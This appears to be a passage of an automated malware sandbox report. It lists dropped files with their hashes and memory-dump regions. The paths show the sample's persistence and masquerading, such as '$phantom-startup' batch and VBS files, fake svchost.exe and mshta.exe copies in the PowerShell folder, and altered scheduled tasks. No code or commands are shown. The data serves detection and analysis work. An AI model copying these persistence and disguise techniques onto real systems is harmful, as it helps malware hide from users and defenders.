MD5ee7322fcbf96be5b2d33f28d3d915a47
SHA131cc4c16e197414434b2624ea4d9f961e8f43c23
SHA256c6cceaf1c7a00e40efa9d62cc6ab84afe6ba7e4945e2fc79a0c3a250b6a686de
SHA51276d5e2e7d072353957bc0f0530a5eae38e82be90824b6c55d30a38e98b93f741ed1e0aff7ca1b8157b6f9c7c62398ba562b86d910f70914ff2492a2512b73b9d
-
C:\Users\Admin\AppData\Local\Temp\Log.tmpFilesize
179B
MD5f74d89d536e8a2ae426c45a2f3fd0a2b
SHA11dc517678defae8318f216de46e6809617cc5d25
SHA2567d1591b797b62567b88bdaba2a7de55c53742887fbdc9e3aa35c295cb1152431
SHA5125fd3c62f1dc19709b467e7873a693475e3b7430490da74d99099e9f72af3a3f51e4b291da7cb97fa51089a5bc4ef47fa5adfce33ca995b4db378dbe568e2cce9
-
C:\Users\Admin\AppData\Local\Temp\Log.tmpFilesize
180B
MD5d78d8756f34b60410512ce9db98f9c7c
SHA1c3edd333e2b0f09410af79c947c7b835586d47f0
SHA256efbfada0a598476ca831cfe468a5a014ab95826926ea75481d36eedb5b0d3b46
SHA51278b3edad5034e1df08ddf3056407aaab6c6b75320d266e7e92a9186c5fbbc4b155723045d92dd15001375030c91bdf0058843f696dfb7ebfb355985bc6b57bda
-
C:\Users\Admin\AppData\Local\Temp\Log.tmpFilesize
181B
MD53bc1b30ea8c274aeea80426314d65e31
SHA1143bd8b11705ba23d42ddb1240f0814404a010c2
SHA256ae924a80fce21f9e3c7fd33372b18707f8c590ada8672f1a2ba3be573eb8008b
SHA51235088f92c94c85555b88b834ec24fa5e185f24e722a1c4af7621c98d8191e68787396cffbf96e4cea41758fe5ea6f9b3024a5f71b8d45aa4b9093b90d58336d8
-
C:\Users\Admin\AppData\Local\Temp\Log.tmpFilesize
182B
MD59e7626e66af50dedc18aa0e54a06c7fc
SHA1f1ce29d2b1aa1e96b57d5fc166e74b7228eb17ba
SHA256ceedfa84b848fccc3cbcfa09f0db4ac742747cc56b34aad6d999a0d6df78545b
SHA5120d4dfb6bba928b9c84c38f2cc6e0ea0ba033e4ca98a8c52408757e661c810e774c059127742400b362c29dce34b4e0563dd212a846d22dde762c1d9ece704501
-
C:\Users\Admin\AppData\Local\Temp\Log.tmpFilesize
183B
MD5b6c18bbe93453c0b7a677ad0c2c04afa
SHA1aa07a6b4ce6ef0f6d149729c978a1493e0f5c3ac
SHA256697f8e7ae712731587c97ba88f8de5b0d64e3c737a68b4c31ee89f70bec6dd40
SHA5129ed807f6842d1a19b3c88d8b01b201a14fd9dd1be18055ea04d7a7224f5e630791d9210ba133aed1a45c44b6cbc7b0ca56d991938b2c16da821bf8b71ce46ebe
-
C:\Users\Admin\AppData\Local\Temp\Log.tmpFilesize
188B
MD5c6af1d6674f7f1da617737000549e4a1
SHA1bb6f871f2a32f5ced7ea3ab01c0dc3baa44613d9
SHA256076b4c4c69d1ed14f2ad63fe8310bb1d0ab0a892c3e6d49f29ef973aa336c4f0
SHA51241d41e4f640c13fce3b20f8677604c279e1956e9ef0a7cd0ffc0f1a2a958784d1902dd9e3c5adade1fabcb5870b480b0474a05d752f43db3fd3970c924484d00
-
C:\Users\Admin\AppData\Local\Temp\Log.tmpFilesize
189B
MD5dbdcb0970437c0f8c1c323629042c834
SHA18b9b67857faac0002119cc73f4acb080e1bc0234
SHA2568335a76d2c2f08188251ef5847d5746607cea085d70724a6e295d5573cae7b7b
SHA5120533142a4e58023ced4222c752e87263b7946a4f235523e648556ad92123957edc23406e8ab4d5a4711813f9bd373126b414a8c3bd40cd554a0513228665fba3
-
C:\Users\Admin\AppData\Local\Temp\Log.tmpFilesize
204B
MD59a0916ade2f9a068803a48288b09171b
SHA180d9a010a5638ce00db38f8b877a26b48c2ee146
SHA256858d1b6c253e13e864b1a5d335ddcb2c101b1970272010c977556e55d044af07
SHA5121082460c2305a157e9215aae71968a40b9c13a547e71cdae98b829aed5457278ff939ad4a920bffa77ac7f262c7dc849b6e26ed48741d542fee71c017db0f857
-
C:\Users\Admin\AppData\Local\Temp\NDFFDA9.tmpFilesize
3KB
MD57af2f1a5ffb42f118679c7249e931c88
SHA1f837dae90ae7d7a9257230a7d98739619e1dda18
SHA25670ffa89e0af89bf86cccc17d50dc9659694f5ed0b27b78a04a3275a1bc41c8d0
SHA512a2df0f344fb8f7e2bf50db07302e619fdb9f2d2d8a5f170110c774643a6e9ebc5ec1d4d4f68cd2872599b00167b261a4fe458eaa7cef65502c6f0619cffb5007
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5tgvqcjs.ab4.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.batFilesize
1.1MB
MD51897b3980473ad054ab05b0f2ced4de7
SHA1a694b444dc8dd30e07f69671c3905ffb6fe13532
SHA2563d25b09ab5a16a6b49a7394175b3bce37ba2ae9ce8771408b05280b1bd14b036
SHA5126f67fe1aca76aa0ff33ebf7f1edc4bae6b25c34c543ffa8f59220e520dea91fe92bd50681a5d3086353ef245bd28887bca93efa276ad2544dfbdbdd188ba5ee1
-
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_962.vbsFilesize
124B
MD5ea54fc2cffa9e8e97b71383f1b5352fa
SHA1cd694823076fed240ae0377fa748ccc1f537fae9
SHA256f73070cc5832787d34a3f77f719bcb59370b7f18f25358fcc39fd64cb96c7f95
SHA512095b4c02ba8a0118e7524a96409f11bf7706d8bba52a6ff688ee0110351d34e737e720f5aa6d36cff8982fc0634175de7beeece43db9457858010a48d094c251
-
C:\Windows\INF\netrasa.PNFFilesize
22KB
MD59aeed08b53f9a8f037159d38c2d1b728
SHA197104206b0daec8a86c5a042d589e24b0d430885
SHA25632a2f9372c269fa63ce4e19f02bf9d85ac4b3a6d96a8a944eece6a0bf46c3d0a
SHA51216598a429371b647e1d84969b77ea14c125c3e70c101abfe5db83b0fea35da6b6d9ec4a1168ef78398a6a1e8b01a77858ea18df02203e34c3395b483066739bb
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exeFilesize
63KB
MD527fe9341167a34f606b800303ac54b1f
SHA186373d218b48361bff1c23ddd08b6ab1803a51d0
SHA25629e13a91af9b0ac77e9b7f8b0c26e5702f46bd8aea0333ca2d191d1d09c70c5d
SHA51205b83ad544862d9c0cfc2651b2842624cff59fc4f454e0b1a2b36a705b558fad5a834f9f1af9f2626c57f1e3cd9aa400e290eaafb6efeb680422992bcbbde5b0
-
C:\Windows\System32\WindowsPowerShell\v1.0\hat.exeFilesize
409KB
MD5e10c7425705b2bd3214fa96247ee21c4
SHA17603536b97ab6337fa023bafcf80579c2b4059e6
SHA256021068ac225e479b124c33d9e7582c17fdea6e625b165b79e2c818479d8094e4
SHA51247e031992d637fef2a67e4fb08d2d82eaba03eba6b80f3e0e0997153acf0d979d0294276c4a10a97daa50130540230865c56191e6fe8df07dbea11c50fa48a2d
-
C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exeFilesize
67KB
MD5092a0c6fe885844fd74947e64e7fc11e
SHA1bfe46f64f36f2e927d862a1a787f146ed2c01219
SHA25691431cb73305e0f1fdc698907301b6d312a350f667c50765615672e7f10a68f2
SHA512022589bd17b46e5486971a59b2517956bb15815266e48dc73a7ae9ac9efd42a348af09df471562eb71ffc94ce1e1845d54ca2994663d1496a385bce50ae595f0
-
C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exeFilesize
79KB
MD51f1b23752df3d29e7604ba52aea85862
SHA1bb582c6cf022098b171c4c9c7318a51de29ebcf4
SHA2564834d31394f19d42e8d2a035b4c3c9c36441340ea19fe766396848ecfb608960
SHA512d52722ab73bb15d4a5b0033351f98f168192f382677e6d474f6cf506cf8dc2f5e421e45279b6cac0f074857f41a865d87b5d989450bfcb8eba925b7baa12fbde
-
C:\Windows\TEMP\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\NetworkDiagnosticsTroubleshoot.ps1Filesize
25KB
MD5d0cfc204ca3968b891f7ce0dccfb2eda
SHA156dad1716554d8dc573d0ea391f808e7857b2206
SHA256e3940266b4368c04333db89804246cb89bf2073626f22b8de72bea27c522282a
SHA5124d2225b599ad8af8ba8516f12cfddca5ec0ce69c5c80b133a6a323e9aaf5e0312efbcfa54d2e4462a5095f9a7c42b9d5b39f3204e0be72c3b1992cf33b22087c
-
C:\Windows\TEMP\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\StartDPSService.ps1Filesize
567B
MD5a660422059d953c6d681b53a6977100e
SHA10c95dd05514d062354c0eecc9ae8d437123305bb
SHA256d19677234127c38a52aec23686775a8eb3f4e3a406f4a11804d97602d6c31813
SHA51226f8cf9ac95ff649ecc2ed349bc6c7c3a04b188594d5c3289af8f2768ab59672bc95ffefcc83ed3ffa44edd0afeb16a4c2490e633a89fce7965843674d94b523
-
C:\Windows\TEMP\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\UtilityFunctions.ps1Filesize
53KB
MD5c912faa190464ce7dec867464c35a8dc
SHA1d1c6482dad37720db6bdc594c4757914d1b1dd70
SHA2563891846307aa9e83bca66b13198455af72af45bf721a2fbd41840d47e2a91201
SHA5125c34352d36459fd8fcda5b459a2e48601a033af31d802a90ed82c443a5a346b9480880d30c64db7ad0e4a8c35b98c98f69eceedad72f2a70d9c6cca74dce826a
-
C:\Windows\TEMP\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\UtilitySetConstants.ps1Filesize
2KB
MD50c75ae5e75c3e181d13768909c8240ba
SHA1288403fc4bedaacebccf4f74d3073f082ef70eb9
SHA256de5c231c645d3ae1e13694284997721509f5de64ee5c96c966cdfda9e294db3f
SHA5128fc944515f41a837c61a6c4e5181ca273607a89e48fbf86cf8eb8db837aed095aa04fc3043029c3b5cb3710d59abfd86f086ac198200f634bfb1a5dd0823406b
-
C:\Windows\TEMP\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\en-US\LocalizationData.psd1Filesize
5KB
MD5380768979618b7097b0476179ec494ed
SHA1af2a03a17c546e4eeb896b230e4f2a52720545ab
SHA2560637af30fc3b3544b1f516f6196a8f821ffbfa5d36d65a8798aeeadbf2e8a7c2
SHA512b9ef59e9bfdbd49052a4e754ead8cd54b77e79cc428e7aee2b80055ff5f0b038584af519bd2d66258cf3c01f8cc71384f6959ee32111eac4399c47e1c2352302
-
C:\Windows\Temp\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\DiagPackage.dllFilesize
478KB
MD5580dc3658fa3fe42c41c99c52a9ce6b0
SHA13c4be12c6e3679a6c2267f88363bbd0e6e00cac5
SHA2565b7aa413e4a64679c550c77e6599a1c940ee947cbdf77d310e142a07a237aad2
SHA51268c52cd7b762b8f5d2f546092ed9c4316924fa04bd3ab748ab99541a8b4e7d9aec70acf5c9594d1457ad3a2f207d0c189ec58421d4352ddbc7eae453324d13f2
-
C:\Windows\Temp\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\en-US\DiagPackage.dll.muiFilesize
17KB
MD544c4385447d4fa46b407fc47c8a467d0
SHA141e4e0e83b74943f5c41648f263b832419c05256
SHA2568be175e8fbdae0dade54830fece6c6980d1345dbeb4a06c07f7efdb1152743f4
SHA512191cd534e85323a4cd9649a1fc372312ed4a600f6252dffc4435793650f9dd40d0c0e615ba5eb9aa437a58af334146aac7c0ba08e0a1bf24ec4837a40f966005
-
C:\Windows\Temp\SDIAG_afe58d0b-e6fa-48c8-9e9f-4a61efd35c9c\result\E3E9C8CC-29C3-4744-B7AC-8F89D4A79EFC.Diagnose.Admin.0.etlFilesize
192KB
MD523f309570819d38a14861b0cf24ec695
SHA10786c999debaa417bc8dab63bf21edf818e7fc1d
SHA2569f3889d8be19a7a6dda4030d2645a3ed0c66655849eba4e10a3ef9b2fbc00c6e
SHA5124048ef8e7215a338389493ec06b108fc5935e4eecf56fe37b7c118293d9f8db072eaf1a030529563611d56d52e04dc50c4cdaea2d82c7e10bb3110a983b4068a
-
\??\pipe\LOCAL\crashpad_2340_PULPCHEOHDMFVBUSMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/620-189-0x0000019827810000-0x00000198278B4000-memory.dmpFilesize
656KB
-
memory/896-101-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmpFilesize
64KB
-
memory/896-102-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmpFilesize
64KB
-
memory/1372-99-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmpFilesize
64KB
-
memory/1372-100-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmpFilesize
64KB
-
memory/1660-105-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmpFilesize
64KB
-
memory/1660-106-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmpFilesize
64KB
-
memory/1736-111-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmpFilesize
64KB
-
memory/1736-112-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmpFilesize
64KB
-
memory/1788-110-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmpFilesize
64KB
-
memory/1788-109-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmpFilesize
64KB
-
memory/1968-107-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmpFilesize
64KB
-
memory/1968-108-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmpFilesize
64KB
-
memory/2056-114-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmpFilesize
64KB
-
memory/2056-113-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmpFilesize
64KB
-
memory/2360-237-0x00000000007A0000-0x00000000007BA000-memory.dmpFilesize
104KB
-
memory/2560-103-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmpFilesize
64KB
-
memory/2560-104-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmpFilesize
64KB
-
memory/2652-50-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmpFilesize
10.8MB
-
memory/2652-0-0x00007FFFEFE53000-0x00007FFFEFE55000-memory.dmpFilesize
8KB
-
memory/2652-16-0x000001A8E2AB0000-0x000001A8E2B8C000-memory.dmpFilesize
880KB
-
memory/2652-15-0x000001A8E2600000-0x000001A8E2608000-memory.dmpFilesize
32KB
-
memory/2652-11-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmpFilesize
10.8MB
-
memory/2652-12-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmpFilesize
10.8MB
-
memory/2652-13-0x000001A8E27C0000-0x000001A8E2804000-memory.dmpFilesize
272KB
-
memory/2652-14-0x000001A8E2A30000-0x000001A8E2AA6000-memory.dmpFilesize
472KB
-
memory/2652-6-0x000001A8E25B0000-0x000001A8E25D2000-memory.dmpFilesize
136KB
-
memory/2736-32-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmpFilesize
10.8MB
-
memory/2736-29-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmpFilesize
10.8MB
-
memory/2736-28-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmpFilesize
10.8MB
-
memory/2736-27-0x00007FFFEFE50000-0x00007FFFF0911000-memory.dmpFilesize
10.8MB
-
memory/3488-98-0x00007FF7CDFD0000-0x00007FF7CDFE0000-memory.dmpFilesize
64KB
-
memory/3488-51-0x0000000003270000-0x000000000329A000-memory.dmpFilesize
168KB
-
memory/3488-97-0x00007FFFB67F0000-0x00007FFFB6800000-memory.dmpFilesize
64KB
-
memory/4332-225-0x0000000000800000-0x0000000000816000-memory.dmpFilesize
88KB
-
memory/4996-219-0x0000000000DE0000-0x0000000000DF8000-memory.dmpFilesize
96KB